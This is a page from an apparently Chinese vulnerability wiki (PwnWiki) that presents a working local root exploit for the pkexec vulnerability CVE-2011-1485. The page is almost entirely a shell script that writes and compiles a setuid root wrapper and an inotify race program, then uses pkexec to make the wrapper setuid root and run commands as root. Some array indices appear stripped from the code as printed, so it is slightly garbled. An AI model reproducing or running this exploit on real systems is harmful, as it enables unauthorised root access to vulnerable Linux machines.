Loading
0

CVE-2011-1485 pkexec特权提升漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

run.sh

# modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh
# for rdot.org
cat > suid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv)
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv1); }
return 0;
}
_EOF
cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
int main(int argc, char **argv)
{
   if (fork() != 0)
	{	    
		int fd;
		char pid_path15;
		sprintf(pid_path, "/proc/%i", getpid());
		close(0); close(1); close(2);
		fd = inotify_init();
		inotify_add_watch(fd, pid_path, IN_ACCESS);
		read(fd, NULL, 0);
		execl("/usr/bin/passwd", "/usr/bin/passwd", NULL);	
	}   
	else
	{
		    execl("/usr/bin/pkexec", "pkexec", argv1,argv2,argv3, NULL);
	}

    return 0;
}

_EOF
gcc -o suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root $PWD/suid
./makesuid chmod u+s $PWD/suid
echo "your suid is on ./suid make sure u move this !!!"
rm suid.c makesuid.c makesuid
$PWD/suid -c /usr/bin/id

免费、自由、人人可编辑的漏洞库--PwnWiki.com